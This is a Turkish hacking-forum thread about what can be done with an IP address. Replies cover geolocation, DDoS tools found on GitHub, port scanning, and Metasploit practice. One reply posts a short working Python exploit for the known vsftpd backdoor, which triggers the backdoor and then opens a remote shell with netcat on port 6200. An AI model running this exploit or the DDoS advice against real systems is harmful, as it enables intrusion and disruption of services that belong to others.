IP Adresi ile neler yapabilirim/yapılabilir?

GrassGamersTv

Yeni üye
26 Haz 2021
20
2
25
Arkadaşlar IP ile Neler Yapılabilir Diye Sormak İstedim Çünkü Siber Güvenlik İçin Denemeler Yaparken IP Adresi İle Birsürü Şey Yapmak İsteedim Ama Hiçbirşey Yapamadım . Hatta Track Toolları Bile Denedim Ama Virtual Box um Kastığı İçin Kali mi Silmek Zorunda Kaldım Bu Yüzdende Araştırmam Yarım Kaldı. Sizden Ricam IP Adresi İle Neler Yapıldığını Açıklayıcı Bir Şekilde Anlatırsanız Sevinirim Çünkü Bazı Arkadaşlar Şu Yapılır Diyip Açıklamıyor . Hangi Uygulama İle Hangi Özelliklerle Nasıl Anlaşılmıyor . Sağolun . . .

LeHunter

Üye
21 Eyl 2021
88
24
26
Turkiye
sana şunu diyeyim neyin ip adresi?
server ip si mi?
ev kullanıcısı ip si mi? (sıradan dükkan vs vs)
yoksa local ip adresimi?
öncelikle server ip si ise port taramasından,exploit işlemine kadar özgürsün.(açık olursa exploit edersin.)
ev kullanıcısı ise boşuna uğraşma zira modemden port açmadıysa gönderdiğin her veri modemde kalır ve bilgisayara iletilmez.
local ipler ise tıpkı server ipleri gibidir herşeyi yapabilirsin genelde bu ip yi modemden alırsın

Muncuk Han

Uzman üye
7 May 2021
1,031
630
43.822302, 87.616875
Arkadaşlar IP ile Neler Yapılabilir Diye Sormak İstedim Çünkü Siber Güvenlik İçin Denemeler Yaparken IP Adresi İle Birsürü Şey Yapmak İsteedim Ama Hiçbirşey Yapamadım . Hatta Track Toolları Bile Denedim Ama Virtual Box um Kastığı İçin Kali mi Silmek Zorunda Kaldım Bu Yüzdende Araştırmam Yarım Kaldı. Sizden Ricam IP Adresi İle Neler Yapıldığını Açıklayıcı Bir Şekilde Anlatırsanız Sevinirim Çünkü Bazı Arkadaşlar Şu Yapılır Diyip Açıklamıyor . Hangi Uygulama İle Hangi Özelliklerle Nasıl Anlaşılmıyor . Sağolun . . .
ilk önce ip adresi ile tahmini bir adres tespiti yapıla bilir ama konum ip ile alakasız da çıka bilir onun içinde internete ipim kaç yazıp aratama yapa bilirsin önüne gelen ilk siteye tıkla or da artma yeri olur oraya da ip yi gir ve arat sana konum vericektir

ve didos ta ata bilirisn onun içinde wifi didos attack github yaz arsan önüne pek çokm tool çıkar birini kullana bilirisn

GrassGamersTv

Yeni üye
26 Haz 2021
20
2
25
sana şunu diyeyim neyin ip adresi?
server ip si mi?
ev kullanıcısı ip si mi? (sıradan dükkan vs vs)
yoksa local ip adresimi?
öncelikle server ip si ise port taramasından,exploit işlemine kadar özgürsün.(açık olursa exploit edersin.)
ev kullanıcısı ise boşuna uğraşma zira modemden port açmadıysa gönderdiğin her veri modemde kalır ve bilgisayara iletilmez.
local ipler ise tıpkı server ipleri gibidir herşeyi yapabilirsin genelde bu ip yi modemden alırsın
Ben Çoğunlukla Siber Güvenlik İle İlgili Uğraşırım Yani Kısacası Local Çok Uğraşırım Serverler Ve Evler İle Pek İlgilenmem Ama Serverlerdede Çalışmam Oldu .Local İp Adresi İle Exploit Nasıl Yapıldığını Anlatırmısın .

GrassGamersTv

Yeni üye
26 Haz 2021
20
2
25
ilk önce ip adresi ile tahmini bir adres tespiti yapıla bilir ama konum ip ile alakasız da çıka bilir onun içinde internete ipim kaç yazıp aratama yapa bilirsin önüne gelen ilk siteye tıkla or da artma yeri olur oraya da ip yi gir ve arat sana konum vericektir

ve didos ta ata bilirisn onun içinde wifi didos attack github yaz arsan önüne pek çokm tool çıkar birini kullana bilirisn
Tahmini Adres Tespiti Bir İşe Yaramaz Çünkü Bircok Modemde Track Engelleyici Vardır Ve Böyle Sitelerden Bulunmaz Ayrıca DDOS Atağı Sadece İnterneti Zayıflatır . Ve Bu İşe Yaramaz Diye Düşünüyorum .

LeHunter

Üye
21 Eyl 2021
88
24
26
Turkiye
Ben Çoğunlukla Siber Güvenlik İle İlgili Uğraşırım Yani Kısacası Local Çok Uğraşırım Serverler Ve Evler İle Pek İlgilenmem Ama Serverlerdede Çalışmam Oldu .Local İp Adresi İle Exploit Nasıl Yapıldığını Anlatırmısın .
Dostum bak öncelikle exploit Türkçe karşılığı istismar etmektir.
örnek veriyorum bir program var program bazı tuşların girişini engelliyor çünki direk terminalden işlem ediyor(mesela) sen bunu geçip oraya zararlı kod yazman dahi exploittir.
genelde exploit yazmak için programlama bilmen gerekir ama tabi hazır exploitlerde vardır metasploit içersinde 100'den fazla exploit bulunan bir araçtır.
metasploit ile sanal makinalar kurup antremanlar yapabilirsin.

GrassGamersTv

Yeni üye
26 Haz 2021
20
2
25
Dostum bak öncelikle exploit Türkçe karşılığı istismar etmektir.
örnek veriyorum bir program var program bazı tuşların girişini engelliyor çünki direk terminalden işlem ediyor(mesela) sen bunu geçip oraya zararlı kod yazman dahi exploittir.
genelde exploit yazmak için programlama bilmen gerekir ama tabi hazır exploitlerde vardır metasploit içersinde 100'den fazla exploit bulunan bir araçtır.
metasploit ile sanal makinalar kurup antremanlar yapabilirsin.
Phyton Ve C# Biliyorum Ama Exploitleme İle İlgili Birşey Hiç Denemedim Çünkü Çoğunlukla Virüs Karşıtı Şeyler Yapmaya Çalışırım :D

LeHunter

Üye
21 Eyl 2021
88
24
26
Turkiye
Phyton Ve C# Biliyorum Ama Exploitleme İle İlgili Birşey Hiç Denemedim Çünkü Çoğunlukla Virüs Karşıtı Şeyler Yapmaya Çalışırım :D
bunu incele bu vsftp programı için yazılmış bir exploit kullanıcı adı, şifre ile barebar : ) eklendiğinde 6200 portu açılıyor bu porttan terminali kullanabiliyorsun.

1. import os
  2. import socket
  3. import time
  4. #vsftpd-exploit ~~LeHunter~~
  6. def portuac(ip):
  7. baglan=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  8. baglan.connect((ip,21))
  9. baglan.send(b"USER TURKHACKTEAM:)\n")
  10. print(baglan.recv(120))
  11. baglan.send(b"PASS Turkhackteamtwo:)\n")
  12. print(baglan.recv(120))
  13. time.sleep(5)
  14. print("6200 port açıldı!")
  15. baglan.close()

16. def yaz(ip):
  17. ac=open("exploit.sh","w")
  18. ac.write("#!/bin/bash\nnc -vn "+ip+" 6200")
  19. ac.close()
  20. os.system("chmod +x exploit.sh")
  21. print("exploit sh oluşturuldu!")

22. if os.name!="nt": # eğer windows değilse
  23. ip=input("ip adresinizi giriniz:")
  24. portuac(ip)
  25. yaz(ip)
  26. else:
  27. print("bu sistem linux için geliştirilmiştir!")

ıcmılızaY

Katılımcı Üye
28 Tem 2021
426
270
18
Belirsiz!
Pek Birşey Yapamazsın Malesefki. Yapabilecekleri Anlatayım Sana. Konum Bulabilirsin, Konumdan İllegal Suçlar İşler Üstüne Atabilir V.B Kötü Biriyseniz Yapabilirsiniz Ama Bizlerin Amacı İyi Hackerler Yazılımcılar Siber Güvenlikçiler V.B Her Dalda İyi Niyetli Eğitimli İnsanlar Yetiştirmek. Karşıdaki Şağısın Ciğazını Yeniden Başlatabilir Ve De Dos-Ddos Atabilir Sistemini Yavaşlatabilir Veya Çökertebilirsin. Umarım İyilik Yolundan Devam Edersin Bu Yola.
-
İYİ FORUMLAR. İYİ NÖBETLER.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.